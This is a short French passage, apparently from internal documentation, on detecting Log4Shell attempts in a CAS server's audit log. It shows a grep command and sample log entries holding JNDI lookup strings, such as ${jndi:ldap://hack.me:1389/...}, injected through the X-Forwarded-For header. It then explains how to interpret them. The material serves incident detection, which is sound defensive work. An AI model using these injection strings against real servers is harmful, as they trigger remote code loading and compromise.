...
| Bloc de code | ||
|---|---|---|
| ||
grep '${\|Reference Class' /opt/tomcat-cas/logs/cas_audit.log
CLIENT IP ADDRESS: ${jndi:ldap://X-Forwarded-For.univ-ville.fr.id-de-test.solution-de-test.net/a.bc}
CLIENT IP ADDRESS: ${jndi:ldap://hack.me:1389//univ-ville.fr/X-Forwarded-For}
CLIENT IP ADDRESS: Reference Class Name: foo |
Notes supplémentaires
...
La chaine Reference Class peut correspondre (sauf si la chaine a été rentrée telle quelle) à une expression ${... qui a résulté de la récupération d'une référence à une classe elle-même non récupérée/exécutée.
Lorsque la chaine ${.. est présente: elle a pu ne pas être interprétée (cas d'un CAS dont la vulnérabilité est fixée) ou elle a pu être interprétée de bout en bout (récupération de la référence, récupération du code) ; une analyse plus poussée (flux) est à envisager.
...